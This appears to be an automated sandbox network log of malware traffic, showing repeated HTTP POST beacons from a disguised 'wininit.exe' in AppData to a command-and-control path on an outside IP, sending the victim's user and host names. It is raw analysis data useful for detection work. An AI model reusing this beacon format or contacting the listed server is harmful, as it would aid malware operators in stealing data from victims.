Nov 20, 2024 10:12:52.935475111 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.22	49251	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:53.185000896 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:53.190103054 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:54.054186106 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.22	49252	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:54.191947937 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:54.198385954 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:55.067984104 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.22	49253	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:55.200165987 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:55.205372095 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:55.953423023 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.22	49254	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:56.115456104 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:56.120814085 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:56.843785048 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.22	49255	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:56.996800900 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:57.001730919 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:57.763031006 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.22	49256	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:57.903553963 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:57.910681963 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:58.780607939 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.22	49257	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:58.987746954 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:58.994067907 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:59.717789888 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.22	49258	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:59.851802111 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:59.856694937 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:00.715209007 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.22	49259	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:00.854696035 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:00.859620094 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:01.604186058 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.22	49260	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:01.802095890 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:01.807106018 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:02.699595928 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.22	49261	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:02.860096931 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:02.864989996 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:03.729377031 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.22	49262	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:03.877337933 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:03.882271051 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:04.648056984 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:04 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.22	49263	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:04.782109022 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:04.788702965 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:05.554836035 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.22	49264	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:05.702789068 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:05.710359097 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:06.563930035 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.22	49265	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:06.709011078 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:06.715979099 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:07.564760923 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.22	49266	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:07.719913006 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:07.728341103 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:08.449316978 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.22	49267	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:08.590316057 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:08.595685959 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:09.331041098 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.22	49268	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:09.476685047 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:09.484579086 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:10.215668917 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.22	49269	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:10.355726957 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:10.364041090 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:11.234061956 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.22	49270	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:11.377935886 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:11.382962942 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:12.128077984 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.22	49271	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:13:12.267328978 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:13:12.272453070 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:13:13.149569035 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:13:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.22	49272	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
